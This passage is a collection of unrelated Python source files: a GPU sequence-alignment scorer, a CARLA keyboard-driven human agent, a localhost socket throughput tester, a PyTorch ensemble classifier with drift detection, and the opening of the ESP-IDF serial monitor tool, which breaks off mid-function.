_matchscore = match if ci == cj and ci != {N} else mismatch # {N} is the 'N' character, which matches nothing
dg_score = last_score[q] + _matchscore
if q != len(score) - 1:
up_score = last_score[q+1] + gap
else:
up_score = A_SMALL_FLOAT
if q != 0:
lf_score = score[q-1] + gap
else:
lf_score = A_SMALL_FLOAT
if dg_score >= up_score-eps and dg_score >= lf_score-eps:
score[q] = dg_score
elif lf_score >= dg_score-eps and lf_score >= up_score-eps:
score[q] = lf_score
else:
score[q] = up_score
# Find which position in 'score' corresponds to the final alignment ([max_i, max_j] in the original explicit matrix)
ans = score[max_j - max_i + max_gaps]
out_arr[pos] = ans"""
def _convert_dna_to_array(dnastr, max_len):
ans = np.zeros(max_len)
for i in range(len(dnastr)):
ans[i] = NTDICT[dnastr[i]]
return(ans)
def seq_to_list(seq, max_len):
seq = [ord(q) for q in seq]
seq.extend([0]*(max_len - len(seq)))
return(seq)
def seqs_to_arrays(seqs, max_len, conn):
seq_arr = [seq_to_list(q,max_len) for q in seqs]
seq_arr = np.array(seq_arr)
conn.send(seq_arr)
conn.close()
# Ugly, but seems to work. Manually spawn three processes, and split the work up among them.
def seqs_to_arrays_triplicate_wrapper(chunk, max_len):
split_pos = len(chunk)/3
lines_1 = copy.copy(chunk[:split_pos])
lines_2 = copy.copy(chunk[split_pos:2*split_pos])
lines_3 = copy.copy(chunk[2*split_pos:])
parent_1, child_1 = Pipe()
p1 = Process(target = seqs_to_arrays, args = (lines_1, max_len, child_1))
p1.start()
parent_2, child_2 = Pipe()
p2 = Process(target = seqs_to_arrays, args = (lines_2, max_len, child_2))
p2.start()
parent_3, child_3 = Pipe()
p3 = Process(target = seqs_to_arrays, args = (lines_3, max_len, child_3))
p3.start()
array_1 = parent_1.recv()
array_2 = parent_2.recv()
array_3 = parent_3.recv()
p1.join()
p2.join()
p3.join()
arrs_out = []
for q in [array_1, array_2, array_3]:
if q.shape[0] > 0:
arrs_out.append(q)
arrs_out = np.concatenate(arrs_out, axis = 0)
return(arrs_out)
# Read lines from file_in; write scores to file_out
# Approach: iteratively read lines from file_in; pass them as conveniently-sized blocks
# to the device and invoke the kernel to align them.
# Written for clarity, not perfect I/O efficiency - CPU-bound preprocessing is bottleneck for me.
def score_file(file_in, file_out, max_gaps, chunk_size, threads_per_block, gap = -5, match = 1, mismatch = 0):
local_size = 2*max_gaps + 1
ks_formatted = KERNEL_STR.format(max_gaps = str(max_gaps), local_size = str(local_size), gap = gap, match = match, mismatch = mismatch, N = str(N_VAL))
exec(ks_formatted)
chunk = []
lens = []
max_len = 0
stream = cuda.stream() # not really necessary in this setup, but keeping in case I want to adapt this code
with open(file_in) as fi, open(file_out, 'w') as fo:
keep_reading = True
while(keep_reading):
# fill the next chunk
while(len(chunk) < chunk_size):
try:
l = fi.next().split(',')[0]
chunk.append(l)
lens.append(len(l))
if max_len < len(l):
max_len = len(l)
except StopIteration:
keep_reading = False
break
if len(chunk) <= 1: # need at least 2 seqs for a comparison
break
# convert the chunk to arrays
scores_local = np.zeros(shape = len(chunk) - 1, dtype = 'float')
seqs_arr_local = seqs_to_arrays_triplicate_wrapper(chunk, max_len)
len_arr_local = np.array(lens)
# send the arrays to the device
stream.synchronize()
seqs_arr_shared = np.copy(seqs_arr_local)
len_arr_shared = np.copy(len_arr_local)
scores_shared = np.copy(scores_local)
seqs_arr_shared, len_arr_shared, scores_shared = cuda.to_device(seqs_arr_shared, stream = stream), cuda.to_device(len_arr_shared, stream = stream), cuda.to_device(scores_shared, stream = stream)
blockspergrid = (seqs_arr_shared.shape[0] + (threads_per_block - 1)) // threads_per_block
hgbrian_score_kernel[blockspergrid, threads_per_block, stream](seqs_arr_shared, len_arr_shared, scores_shared)
stream.synchronize() # <- if the kernel was more time-intensive, we could revise this to do preprocessing while the kernel runs - makes bookkeeping to get the output back nontrivial and bug-prone though.
# Copy the results to host, and write them
scores_local = np.copy(scores_shared.copy_to_host())
for q in range(scores_local.shape[0]):
fo.write("%s\n" % str(scores_local[q]))
write_scores = False
# prepare for the next chunk; start the next chunk with the last sequence in this one, as we don't know the distance to its successor yet.
chunk = [chunk[-1]]
lens = [lens[-1]]
max_len = len(chunk[0])
def test_nw_align_to_score(aln):
score = 0
for (i,j) in zip(aln[0], aln[1]):
if i == '-' or j == '-':
score = score - 1
elif i == j and i != 'N':
score = score + 1
return(score)
if __name__ == '__main__':
file_in, file_out, max_gaps, chunk_size = sys.argv[1:]
max_gaps, chunk_size = int(max_gaps), int(chunk_size)
score_file(file_in, file_out, max_gaps, chunk_size)
|
HumanAgent.py
|
import cv2
import numpy as np
import time
from threading import Thread
try:
import pygame
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
class HumanInterface():
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self.WIDTH = 800
self.HEIGHT = 600
self.THROTTLE_DELTA = 0.05
self.STEERING_DELTA = 0.01
def run(self):
while not self._parent.agent_engaged and not self.quit:
time.sleep(0.5)
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self.WIDTH, self.HEIGHT), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Human Agent")
controller = KeyboardControl()
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump()
# process sensor data
input_data = self._parent.sensor_interface.get_data()
image_center = input_data['Center'][1][:,:,-2::-1]
image_left = input_data['Left'][1][:,:,-2::-1]
image_right = input_data['Right'][1][:,:,-2::-1]
image_rear = input_data['Rear'][1][:,:,-2::-1]
top_row = np.hstack((image_left, image_center, image_right))
bottom_row = np.hstack((0*image_rear, image_rear, 0*image_rear))
comp_image = np.vstack((top_row, bottom_row))
# resize image
image_rescaled = cv2.resize(comp_image, dsize=(self.WIDTH, self.HEIGHT), interpolation=cv2.INTER_CUBIC)
# display image
self._surface = pygame.surfarray.make_surface(image_rescaled.swapaxes(0, 1))
if self._surface is not None:
self._display.blit(self._surface, (0, 0))
pygame.display.flip()
pygame.quit()
class HumanAgent(AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = Track.ALL_SENSORS_HDMAP_WAYPOINTS
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
:return: a list containing the required sensors in the following format:
[
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor01'],
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor02'],
['sensor.lidar.ray_cast', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll}, 'Sensor03']
]
"""
sensors = [{'type': 'sensor.camera.rgb', 'x':0.7, 'y':0.0, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':0.0,
'width':300, 'height':200, 'fov':100, 'id': 'Center'},
{'type': 'sensor.camera.rgb', 'x':0.7, 'y':-0.4, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': -45.0, 'width': 300, 'height': 200, 'fov': 100, 'id': 'Left'},
{'type': 'sensor.camera.rgb', 'x': 0.7, 'y':0.4, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':45.0,
'width':300, 'height':200, 'fov': 100, 'id': 'Right'},
{'type': 'sensor.camera.rgb', 'x': -1.8, 'y': 0, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': 180.0, 'width': 300, 'height': 200, 'fov': 130, 'id': 'Rear'},
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'}
]
return sensors
def run_step(self, input_data, timestamp):
self.agent_engaged = True
time.sleep(0.1)
return self.current_control
def destroy(self):
self._hic.quit = True
self._thread.join()
class KeyboardControl(object):
def __init__(self):
self._control = carla.VehicleControl()
self._steer_cache = 0.0
def parse_events(self, control, clock):
print('parse_events')
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
control.steer = self._control.steer
control.throttle = self._control.throttle
control.brake = self._control.brake
control.hand_brake = self._control.hand_brake
def _parse_vehicle_keys(self, keys, milliseconds):
self._control.throttle = 0.6 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 15.0 * 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.95, max(-0.95, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = keys[K_SPACE]
|
perf2.py
|
from socket import *
import time
from threading import Thread
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('localhost', 25000))
n= 0
def monitor():
global n
while True:
time.sleep(1)
print(n, 'reqs/s')
n = 0
Thread(target=monitor).start()
while True:
sock.send(b'1')
resp = sock.recv(100)
n += 1
|
NNPytorchMulti.py
|
import threading
import numpy as np
from skmultiflow.core import BaseSKMObject, ClassifierMixin
from skmultiflow.utils.utils import *
from skmultiflow.neural_networks.utils import *
from skmultiflow.drift_detection.base_drift_detector import BaseDriftDetector
from skmultiflow.drift_detection import ADWIN
import torch
import torch.nn as nn
import torch.optim as optim
default_network_layers = [{'neurons': 0, 'input_d': 0}, {'neurons': 2 ** 10, 'g': 3}, {'neurons': 1, 'g': 1}]
OP_TYPE_SGD = 'SGD'
OP_TYPE_SGD_NC = 'SGD-NC'
OP_TYPE_ADAGRAD = 'Adagrad'
OP_TYPE_ADAGRAD_NC = 'Adagrad-NC'
OP_TYPE_RMSPROP = 'RMSprop'
OP_TYPE_RMSPROP_NC = 'RMSprop-NC'
OP_TYPE_ADADELTA = 'Adadelta'
OP_TYPE_ADADELTA_NC = 'Adadelta-NC'
OP_TYPE_ADAM = 'Adam'
OP_TYPE_ADAM_NC = 'Adam-NC'
OP_TYPE_ADAM_AMSG = 'Adam-AMSG'
OP_TYPE_ADAM_AMSG_NC = 'Adam-AMSG-NC'
class PyNet(nn.Module):
def __init__(self, nn_layers=None):
super(PyNet, self).__init__()
if nn_layers is None:
return
linear = []
self.f = []
for l in range(1, len(nn_layers), 1):
if l == 1:
linear.append(nn.Linear(nn_layers[0]['input_d'], nn_layers[l]['neurons']))
else:
linear.append(nn.Linear(nn_layers[l - 1]['neurons'], nn_layers[l]['neurons']))
if nn_layers[l]['g'] == Tanh:
self.f.append(nn.Tanh())
elif nn_layers[l]['g'] == Sigmoid:
self.f.append(nn.Sigmoid())
elif nn_layers[l]['g'] == Relu:
self.f.append(nn.ReLU())
elif nn_layers[l]['g'] == LeakyRelu:
self.f.append(nn.LeakyReLU())
else:
pass
self.linear = nn.ModuleList(linear)
def forward(self, x):
for i, l in enumerate(self.linear):
x = self.f[i](l(x))
return x
class ANN:
def __init__(self,
learning_rate=0.03,
network_layers=default_network_layers,
class_labels=['0','1'], # {'up':0,'down':1}
use_cpu=True,
process_as_a_batch=False,
optimizer_type=OP_TYPE_SGD,
warning_detection_method: BaseDriftDetector = ADWIN(delta=1e-8, direction=ADWIN.DETECT_DOWN),
drift_detection_method: BaseDriftDetector = ADWIN(delta=1e-3, direction=ADWIN.DETECT_DOWN)):
# configuration variables (which has the same name as init parameters)
self.learning_rate = learning_rate
self.network_layers = copy.deepcopy(network_layers)
self.class_labels = class_labels
self.use_cpu = use_cpu
self.process_as_a_batch = process_as_a_batch
self.optimizer_type = optimizer_type
if self.optimizer_type == OP_TYPE_SGD_NC \
or self.optimizer_type == OP_TYPE_ADAGRAD_NC \
or self.optimizer_type == OP_TYPE_RMSPROP_NC \
or self.optimizer_type == OP_TYPE_ADADELTA_NC \
or self.optimizer_type == OP_TYPE_ADAM_NC \
or self.optimizer_type == OP_TYPE_ADAM_AMSG_NC:
self.drift_detection_method = None
self.warning_detection_method = None
else:
self.drift_detection_method = drift_detection_method
if self.drift_detection_method.__class__.__name__ == 'HDDM_A' \
or self.drift_detection_method.__class__.__name__ == 'HDDM_W':
if warning_detection_method is not None:
print('Parameter warning_detection_method should be None for drift_detection_methods HDDM_A and'
' HDDM_W as they have in built warning detection. Hence setting it to None.')
self.warning_detection_method = None
else:
self.warning_detection_method = None
else:
self.warning_detection_method = warning_detection_method
# status variables
self.net = None
self.optimizer = None
self.criterion = None
self.loss = None
self.device = None
self.class_to_label = {}
self.label_to_class = {}
self.samples_seen = 0
self.detected_warnings = 0
self.init_values()
def init_values(self):
# init status variables
self.net = None
self.optimizer = None
self.criterion = None
self.loss = None
self.device = None
self.class_to_label = {}
self.label_to_class = {}
self.samples_seen = 0
self.detected_warnings = 0
initialize_network = False
for i in range(len(self.class_labels)):
self.class_to_label.update({i: self.class_labels[i]})
self.label_to_class.update({self.class_labels[i]: i})
if isinstance(self.network_layers, nn.Module):
self.net = self.network_layers
self.initialize_net_para()
elif isinstance(self.network_layers, list):
if self.network_layers[0]['input_d'] is None or self.network_layers[0]['input_d'] == 0:
# wait till we receive the first instance to get input dimensions
# to initialize the passed-in network
self.network_layers[0]['input_d'] = 0
else:
initialize_network = True
else:
self.network_layers = copy.deepcopy(default_network_layers)
print('Unknown network type passed in, set the network type to default: {}'.format(self.network_layers))
if initialize_network:
self.initialize_network(self.network_layers)
if self.use_cpu:
self.device = torch.device("cpu")
else:
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# print(self.device)
def init_optimizer(self):
if self.optimizer_type == OP_TYPE_ADAGRAD or self.optimizer_type == OP_TYPE_ADAGRAD_NC:
self.optimizer = optim.Adagrad(self.net.parameters(), lr=self.learning_rate, lr_decay=0, weight_decay=0,
initial_accumulator_value=0, eps=1e-10)
elif self.optimizer_type == OP_TYPE_ADADELTA or self.optimizer_type == OP_TYPE_ADADELTA_NC:
self.optimizer = optim.Adadelta(self.net.parameters(), lr=self.learning_rate, eps=1e-10)
elif self.optimizer_type == OP_TYPE_RMSPROP or self.optimizer_type == OP_TYPE_RMSPROP_NC:
self.optimizer = optim.RMSprop(self.net.parameters(), lr=self.learning_rate, alpha=0.99, weight_decay=0,
eps=1e-10)
elif self.optimizer_type == OP_TYPE_SGD or self.optimizer_type == OP_TYPE_SGD_NC:
self.optimizer = optim.SGD(self.net.parameters(), lr=self.learning_rate)
elif self.optimizer_type == OP_TYPE_ADAM or self.optimizer_type == OP_TYPE_ADAM_NC:
self.optimizer = optim.Adam(self.net.parameters(), lr=self.learning_rate, betas=(0.9, 0.999), eps=1e-10,
weight_decay=0, amsgrad=False)
elif self.optimizer_type == OP_TYPE_ADAM_AMSG or self.optimizer_type == OP_TYPE_ADAM_AMSG_NC:
self.optimizer = optim.Adam(self.net.parameters(), lr=self.learning_rate, betas=(0.9, 0.999), eps=1e-10,
weight_decay=0, amsgrad=True)
else:
print('Invalid optimizer type = {}'.format(self.optimizer_type))
def initialize_net_para(self):
self.init_optimizer()
# for multi class classification
# criterion = nn.CrossEntropyLoss()
# for binary classification
# combines a Sigmoid layer
# self.criterion = nn.BCEWithLogitsLoss()
self.criterion = nn.BCELoss()
print('Network configuration:\n'
'{}\n'
'======================================='.format(self))
def initialize_network(self, network_layers=None):
self.net = PyNet(network_layers)
self.initialize_net_para()
def train_net(self, x, y):
if torch.cuda.is_available():
if self.device.type == 'cpu':
pass
else:
x = x.to(self.device)
y = y.to(self.device)
else:
pass
self.optimizer.zero_grad() # zero the gradient buffers
# # forward propagation
output = self.net(x)
# backward propagation
# print(self.learning_rate)
# print(self.net.linear[0].weight.data)
if self.learning_rate > 0.0:
# print('here')
self.loss = self.criterion(output, y)
self.loss.backward()
self.optimizer.step() # Does the update
if self.drift_detection_method is not None:
# get predicted class and compare with actual class label
labels_proba = torch.cat((1 - output, output), 1)
predicted_label = torch.argmax(labels_proba, dim=1)
predicted_matches_actual = predicted_label == y
self.drift_detection_method.add_element(1 if predicted_matches_actual else 0)
if self.warning_detection_method is not None:
self.warning_detection_method.add_element(1 if predicted_matches_actual else 0)
# pass the difference to the detector
# predicted_matches_actual = torch.abs(y-output).detach().numpy()[0]
# self.drift_detection_method.add_element(predicted_matches_actual)
# Check if the was a warning
if self.warning_detection_method is not None:
if self.warning_detection_method.detected_change():
self.detected_warnings += 1
else: # warning detector is None, hence drift detector has warning detection capability.
if self.drift_detection_method.detected_warning_zone():
self.detected_warnings += 1 # 3 is the threshold level
# Check if the was a change
if self.detected_warnings > 3 and self.drift_detection_method.detected_change():
print('Drift detected by {} around {} th sample. Hence resetting optimizer'.format(
self.drift_detection_method, self.samples_seen))
self.detected_warnings = 0
self.init_optimizer()
def partial_fit(self, X, r, c, y):
# r, c = get_dimensions(X)
if self.net is None:
self.network_layers[0]['input_d'] = c
self.initialize_network(self.network_layers)
if self.process_as_a_batch:
self.samples_seen += r
self.train_net(x=torch.from_numpy(X).float(), y=torch.from_numpy(np.array(y)).view(-1, 1).float())
else: # per instance processing (default behaviour)
for i in range(r):
x = torch.from_numpy(X[i])
yy = torch.from_numpy(np.array(y[i]))
x = x.view(1, -1).float()
yy = yy.view(1, -1).float()
x.unsqueeze(0)
yy.unsqueeze(0)
self.samples_seen += 1
self.train_net(x=x, y=yy)
return self
def predict_proba(self, X, r, c):
# r, c = get_dimensions(X)
if self.net is None:
self.network_layers[0]['input_d'] = c
self.initialize_network(self.network_layers)
if self.process_as_a_batch:
y_prob = self.net(torch.from_numpy(X).float())
return torch.cat((1 - y_prob, y_prob), 1).detach().numpy()
else: # per instance processing (default behaviour)
proba = []
for i in range(r):
x = torch.from_numpy(X[i])
x = x.view(1, -1).float()
x.unsqueeze(0)
y_prob = self.net(x)
proba.append([1 - y_prob, y_prob])
return np.asarray(proba)
def reset(self):
# configuration variables (which has the same name as init parameters) should be copied by the caller function
self.init_values()
return self
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
def net_train(net: ANN, X: np.ndarray, r, c, y: np.ndarray):
net.partial_fit(X, r, c, y)
def net_predict_proba(net: ANN, X: np.ndarray, r, c, proba, i):
proba[i] = net.predict_proba(X, r, c)
net_config = [
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.05},
{'optimizer_type': OP_TYPE_SGD_NC, 'l_rate': 0.07},
{'optimizer_type': OP_TYPE_RMSPROP_NC, 'l_rate': 0.01},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_ADAGRAD_NC, 'l_rate': 0.03},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.07},
{'optimizer_type': OP_TYPE_ADAGRAD, 'l_rate': 0.09},
{'optimizer_type': OP_TYPE_ADAGRAD_NC, 'l_rate': 0.09},
{'optimizer_type': OP_TYPE_ADAM, 'l_rate': 0.01},
{'optimizer_type': OP_TYPE_ADAM_NC, 'l_rate': 0.01},
]
class DeepNNPytorch(BaseSKMObject, ClassifierMixin):
def __init__(self,
learning_rate=0.03,
network_layers=default_network_layers,
class_labels=['0','1'], # {'up':0,'down':1}
use_cpu=True,
process_as_a_batch=False,
optimizer_type=OP_TYPE_SGD,
warning_detection_method: BaseDriftDetector = ADWIN(delta=1e-8),
drift_detection_method: BaseDriftDetector = ADWIN(delta=1e-3),
use_threads=False):
# configuration variables (which has the same name as init parameters)
self.class_labels = class_labels
self.use_threads = use_threads
super().__init__()
# status variables
self.nets = [] # type: List[ANN]
self.class_to_label = {}
self.init_values()
def init_values(self):
# init status variables
self.class_to_label = {}
for i in range(len(self.class_labels)):
self.class_to_label.update({i: self.class_labels[i]})
for i in range(len(net_config)):
self.nets.append(ANN(learning_rate=net_config[i]['l_rate'], optimizer_type=net_config[i]['optimizer_type'],
class_labels=self.class_labels))
def partial_fit(self, X, y, classes=None, sample_weight=None):
r, c = get_dimensions(X)
if self.use_threads:
t = []
for i in range(len(self.nets)):
t.append(threading.Thread(target=net_train, args=(self.nets[i], X, r, c, y,)))
for i in range(len(self.nets)):
t[i].start()
for i in range(len(self.nets)):
t[i].join()
else:
for i in range(len(self.nets)):
net_train(self.nets[i], X, r, c, y)
return self
def predict(self, X):
y_proba = self.predict_proba(X)
pred_sum_per_class = np.sum(y_proba, axis=0)
pred_avgsum_per_class = np.divide(pred_sum_per_class, len(self.nets))
y_pred = np.argmax(pred_avgsum_per_class, axis=0)
return vectorized_map_class_to_label([y_pred], class_to_label_map=self.class_to_label)
def predict_proba(self, X):
r, c = get_dimensions(X)
proba = np.zeros([len(self.nets), 2])
# if self.use_threads:
# t = []
# for i in range(len(self.nets)):
# t.append(threading.Thread(target=net_predict_proba, args=(self.nets[i], X, r, c, proba, i,)))
#
# for i in range(len(self.nets)):
# t[i].start()
#
# for i in range(len(self.nets)):
# t[i].join()
# else:
for i in range(len(self.nets)):
net_predict_proba(self.nets[i], X, r, c, proba, i)
return np.asarray(proba)
def reset(self):
# configuration variables (which has the same name as init parameters) should be copied by the caller function
for i in range(len(self.nets)):
self.nets[i].reset()
return self
def stream_ended(self):
pass
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
# - If core dump output is detected, it is converted to a human-readable report
# by espcoredump.py.
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import division, print_function, unicode_literals
import argparse
import codecs
import datetime
import os
import re
import subprocess
from builtins import bytes, chr, object
try:
import queue
except ImportError:
import Queue as queue
import ctypes
import json
import shlex
import sys
import tempfile
import textwrap
import threading
import time
import types
from distutils.version import StrictVersion
from io import open
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
try:
import websocket
except ImportError:
# This is needed for IDE integration only.
pass
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color, newline='\n'):
""" Print a message to stderr with colored highlighting """
sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))
def yellow_print(message, newline='\n'):
color_print(message, ANSI_YELLOW, newline)
def red_print(message, newline='\n'):
color_print(message, ANSI_RED, newline)
__version__ = '1.1'
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = 'xtensa-esp32-elf-'
DEFAULT_PRINT_FILTER = ''
# coredump related messages
COREDUMP_UART_START = b'================= CORE DUMP START ================='
COREDUMP_UART_END = b'================= CORE DUMP END ================='
COREDUMP_UART_PROMPT = b'Press Enter to print core dump to UART...'
# coredump states
COREDUMP_IDLE = 0
COREDUMP_READING = 1
COREDUMP_DONE = 2
# coredump decoding options
COREDUMP_DECODE_DISABLE = 'disable'
COREDUMP_DECODE_INFO = 'info'
# panic handler related messages
PANIC_START = r'Core \s*\d+ register dump:'
PANIC_END = b'ELF file SHA256:'
PANIC_STACK_DUMP = b'Stack memory:'
# panic handler decoding states
PANIC_IDLE = 0
PANIC_READING = 1
# panic handler decoding options
PANIC_DECODE_DISABLE = 'disable'
PANIC_DECODE_BACKTRACE = 'backtrace'
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol='CRLF'):
self.translate_eol = {
'CRLF': lambda c: c.replace('\n', '\r\n'),
'CR': lambda c: c.replace('\n', '\r'),
'LF': lambda c: c.replace('\r', '\n'),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
